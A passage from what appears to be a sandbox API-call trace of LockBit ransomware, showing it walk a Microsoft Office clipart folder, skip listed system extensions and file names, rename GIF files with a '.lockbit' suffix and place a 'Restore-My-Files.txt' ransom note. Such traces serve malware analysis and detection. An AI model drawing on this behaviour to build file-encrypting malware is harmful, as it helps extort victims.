lpString2="AG00157_.GIF") returned 1 [0101.371] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00157_.GIF") returned 1 [0101.371] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00157_.GIF") returned 1 [0101.371] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00157_.GIF") returned 1 [0101.371] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00157_.GIF") returned 1 [0101.371] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.372] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned=".GIF" [0101.372] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.372] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.372] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.372] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.372] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.372] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.372] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.372] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.372] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.372] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.372] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.372] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.372] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.372] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.372] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.372] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.372] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.372] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.372] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.372] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.372] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.373] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.373] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.373] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.373] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.373] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.373] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.373] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.373] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.lockbit") returned 72 [0101.373] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13e4 [0101.373] CreateIoCompletionPort (FileHandle=0x13e4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.374] malloc (_Size=0x40068) returned 0x3e30008 [0101.374] GetFileSizeEx (in: hFile=0x13e4, lpFileSize=0x3e30020 | out: lpFileSize=0x3e30020*=4955) returned 1 [0101.374] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.489] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e7003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e7003c) returned 0x0 [0101.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.490] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e7004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e7004c) returned 0x0 [0101.490] ReadFile (in: hFile=0x13e4, lpBuffer=0x3e3003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008 | out: lpBuffer=0x3e3003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30008) returned 0x0 [0101.494] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.494] malloc (_Size=0xa6) returned 0x77d800 [0101.494] NtSetInformationFile (FileHandle=0x13e4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.495] free (_Block=0x77d800) [0101.495] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.495] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.495] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.495] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad7cc700, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad7cc700, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x13a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00158_.GIF", cAlternateFileName="")) returned 1 [0101.495] lstrcmpiW (lpString1=".", lpString2="AG00158_.GIF") returned -1 [0101.495] lstrcmpiW (lpString1="..", lpString2="AG00158_.GIF") returned -1 [0101.495] PathFindExtensionW (pszPath="AG00158_.GIF") returned=".GIF" [0101.495] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.495] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.495] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.495] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.495] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.495] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.496] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.496] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.496] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.496] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.496] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.496] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.496] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.496] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.496] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.497] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00158_.GIF") returned 1 [0101.497] lstrcmpiW (lpString1="ntldr", lpString2="AG00158_.GIF") returned 1 [0101.497] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00158_.GIF") returned 1 [0101.497] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00158_.GIF") returned 1 [0101.497] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00158_.GIF") returned 1 [0101.497] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00158_.GIF") returned 1 [0101.497] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00158_.GIF") returned 1 [0101.497] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.497] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned=".GIF" [0101.497] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.497] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.498] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.498] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.498] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.498] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.498] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.498] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.498] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.498] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.498] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.498] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.498] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.498] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.498] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.498] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.498] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.498] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.498] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.498] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.498] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.498] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.498] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.498] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.498] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.498] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.498] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.498] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.lockbit") returned 72 [0101.498] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xcac [0101.499] CreateIoCompletionPort (FileHandle=0xcac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.499] malloc (_Size=0x40068) returned 0x3d70048 [0101.499] GetFileSizeEx (in: hFile=0xcac, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=5030) returned 1 [0101.499] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.501] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.501] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0101.501] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0101.502] ReadFile (in: hFile=0xcac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0101.508] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.508] malloc (_Size=0xa6) returned 0x77d800 [0101.508] NtSetInformationFile (FileHandle=0xcac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.509] free (_Block=0x77d800) [0101.509] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.509] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.509] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.509] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a69f700, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9a69f700, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x47a, dwReserved0=0x0, dwReserved1=0x0, cFileName="AG00160_.GIF", cAlternateFileName="")) returned 1 [0101.509] lstrcmpiW (lpString1=".", lpString2="AG00160_.GIF") returned -1 [0101.509] lstrcmpiW (lpString1="..", lpString2="AG00160_.GIF") returned -1 [0101.509] PathFindExtensionW (pszPath="AG00160_.GIF") returned=".GIF" [0101.509] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0101.509] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0101.509] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0101.509] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0101.509] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0101.509] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0101.509] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0101.509] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0101.509] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0101.509] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0101.509] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0101.509] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0101.509] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0101.509] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0101.510] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0101.510] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0101.510] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0101.510] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0101.510] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0101.510] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0101.510] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0101.511] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0101.511] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0101.511] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0101.511] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0101.511] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0101.511] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0101.511] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0101.511] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AG00160_.GIF") returned 1 [0101.511] lstrcmpiW (lpString1="ntldr", lpString2="AG00160_.GIF") returned 1 [0101.511] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AG00160_.GIF") returned 1 [0101.511] lstrcmpiW (lpString1="bootsect.bak", lpString2="AG00160_.GIF") returned 1 [0101.511] lstrcmpiW (lpString1="autorun.inf", lpString2="AG00160_.GIF") returned 1 [0101.511] lstrcmpiW (lpString1="thumbs.db", lpString2="AG00160_.GIF") returned 1 [0101.511] lstrcmpiW (lpString1="iconcache.db", lpString2="AG00160_.GIF") returned 1 [0101.511] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0101.511] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned=".GIF" [0101.511] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0101.511] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0101.511] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0101.511] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0101.511] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0101.511] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0101.511] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0101.511] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0101.511] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0101.511] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0101.512] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0101.512] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0101.512] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0101.512] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0101.512] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0101.512] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0101.512] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0101.512] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0101.512] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0101.512] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0101.512] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0101.512] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0101.512] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0101.512] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0101.512] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0101.512] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0101.512] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0101.512] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0101.512] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.lockbit") returned 72 [0101.512] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xcb0 [0101.513] CreateIoCompletionPort (FileHandle=0xcb0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0101.513] malloc (_Size=0x40068) returned 0x1ff1e60 [0101.513] GetFileSizeEx (in: hFile=0xcb0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1146) returned 1 [0101.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0101.515] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.516] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0101.516] ReadFile (in: hFile=0xcb0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0101.522] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0101.522] malloc (_Size=0xa6) returned 0x77d800 [0101.522] NtSetInformationFile (FileHandle=0xcb0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0101.523] free (_Block=0x77d800) [0101.523] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0101.523] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0101.523] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0101.523] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a54300, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x95a54300, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, 